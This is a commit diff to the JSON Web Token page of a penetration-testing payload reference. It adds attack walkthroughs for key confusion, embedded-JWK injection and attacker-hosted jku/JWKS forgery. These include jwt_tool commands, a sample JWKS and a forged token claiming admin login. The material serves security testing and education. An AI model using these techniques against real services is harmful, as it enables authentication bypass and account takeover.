wanderer/ PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-08 23:16:06 +02:00
Code Issues Releases Activity

JWT jku and jwks - manual exploitation

This commit is contained in:
Swissky 2023-03-12 18:02:29 +01:00
parent d5729888c3
commit 579207aa8f
1 changed files with 47 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

57
JSON Web Token/README.md
View File

@ -12,7 +12,7 @@
- [JWT Signature](#jwt-signature) - [JWT Signature](#jwt-signature)
- [JWT Signature - Null Signature Attack (CVE-2020-28042)](#jwt-signature---null-signature-attack-cve-2020-28042) - [JWT Signature - Null Signature Attack (CVE-2020-28042)](#jwt-signature---null-signature-attack-cve-2020-28042)
- [JWT Signature - Disclosure of a correct signature (CVE-2019-7644)](#jwt-signature---disclosure-of-a-correct-signature-cve-2019-7644) - [JWT Signature - Disclosure of a correct signature (CVE-2019-7644)](#jwt-signature---disclosure-of-a-correct-signature-cve-2019-7644)
- [JWT Signature - None algorithm (CVE-2015-9235)](#jwt-signature---none-algorithm-cve-2015-9235) - [JWT Signature - None Algorithm (CVE-2015-9235)](#jwt-signature---none-algorithm-cve-2015-9235)
- [JWT Signature - Key Confusion Attack RS256 to HS256 (CVE-2016-5431)](#jwt-signature---key-confusion-attack-rs256-to-hs256-cve-2016-5431) - [JWT Signature - Key Confusion Attack RS256 to HS256 (CVE-2016-5431)](#jwt-signature---key-confusion-attack-rs256-to-hs256-cve-2016-5431)
- [JWT Signature - Key Injection Attack (CVE-2018-0114)](#jwt-signature---key-injection-attack-cve-2018-0114) - [JWT Signature - Key Injection Attack (CVE-2018-0114)](#jwt-signature---key-injection-attack-cve-2018-0114)
- [JWT Secret](#jwt-secret) - [JWT Secret](#jwt-secret)
@ -152,7 +152,7 @@ Invalid signature. Expected 8Qh5lJ5gSaQylkSdaCIDBoOqKzhoJ0Nutkkap8RgB1Y= got 8Qh
``` ```
### JWT Signature - None algorithm (CVE-2015-9235) ### JWT Signature - None Algorithm (CVE-2015-9235)
JWT supports a `None` algorithm for signature. This was probably introduced to debug applications. However, this can have a severe impact on the security of the application. JWT supports a `None` algorithm for signature. This was probably introduced to debug applications. However, this can have a severe impact on the security of the application.
@ -207,6 +207,17 @@ print jwt.encode({"data":"test"}, key=public, algorithm='HS256')
```ps1 ```ps1
python3 jwt_tool.py JWT_HERE -X k -pk my_public.pem python3 jwt_tool.py JWT_HERE -X k -pk my_public.pem
``` ```
* Using [portswigger/JWT Editor](https://portswigger.net/bappstore/26aaa5ded2f74beea19e2ed8345a93dd)
1. Find the public key, usually in `/jwks.json` or `/.well-known/jwks.json`
2. Load it in the JWT Editor Keys tab, click `New RSA Key`.
3. . In the dialog, paste the JWK that you obtained earlier: `{"kty":"RSA","e":"AQAB","use":"sig","kid":"961a...85ce","alg":"RS256","n":"16aflvW6...UGLQ"}`
4. Select the PEM radio button and copy the resulting PEM key.
5. Go to the Decoder tab and Base64-encode the PEM.
6. Go back to the JWT Editor Keys tab and generate a `New Symmetric Key` in JWK format.
7. Replace the generated value for the k parameter with a Base64-encoded PEM key that you just copied.
8. Edit the JWT token alg to `HS256` and the data.
9. Click `Sign` and keep the option: `Don't modify header`
* Manually using the following steps to edit an RS256 JWT token into an HS256 * Manually using the following steps to edit an RS256 JWT token into an HS256
1. Convert our public key (key.pem) into HEX with this command. 1. Convert our public key (key.pem) into HEX with this command.
@ -243,9 +254,14 @@ print jwt.encode({"data":"test"}, key=public, algorithm='HS256')
**Exploit**: **Exploit**:
```ps1 * Using [ticarpi/jwt_tool]
python3 jwt_tool.py [JWT_HERE] -X i ```ps1
``` python3 jwt_tool.py [JWT_HERE] -X i
```
* Using [portswigger/JWT Editor](#)
1. Add a `New RSA key`
2. In the JWT's Repeater tab, edit data
3. `Attack` > `Embedded JWK`
**Deconstructed**: **Deconstructed**:
```json ```json
@ -432,17 +448,38 @@ It is sometimes exposed publicly via a standard endpoint:
* `/api/keys` * `/api/keys`
* `/api/v1/keys` * `/api/v1/keys`
You should create your own key pair for this attack and host it. It should look like that:
```json
{
"keys": [
{
"kid": "beaefa6f-8a50-42b9-805a-0ab63c3acc54",
"kty": "RSA",
"e": "AQAB",
"n": "nJB2vtCIXwO8DN[...]lu91RySUTn0wqzBAm-aQ"
}
]
}
```
**Exploit**: **Exploit**:
```ps1 * Using [ticarpi/jwt_tool]
python3 jwt_tool.py JWT_HERE -X s ```ps1
python3 jwt_tool.py JWT_HERE -X s -ju http://example.com/jwks.json python3 jwt_tool.py JWT_HERE -X s
``` python3 jwt_tool.py JWT_HERE -X s -ju http://example.com/jwks.json
```
* Using [portswigger/JWT Editor](#)
1. Generate a new RSA key and host it
2. Edit JWT's data
3. Replace the `kid` header with the one from your JWKS
4. Add a `jku` header and sign the JWT (`Don't modify header` option should be checked)
**Deconstructed**: **Deconstructed**:
```json ```json
{"typ":"JWT","alg":"RS256", "jku":"https://example.com/jwks.json"}. {"typ":"JWT","alg":"RS256", "jku":"https://example.com/jwks.json", "kid":"id_of_jwks"}.
{"login":"admin"}. {"login":"admin"}.
[Signed with new Private key; Public key exported] [Signed with new Private key; Public key exported]
``` ```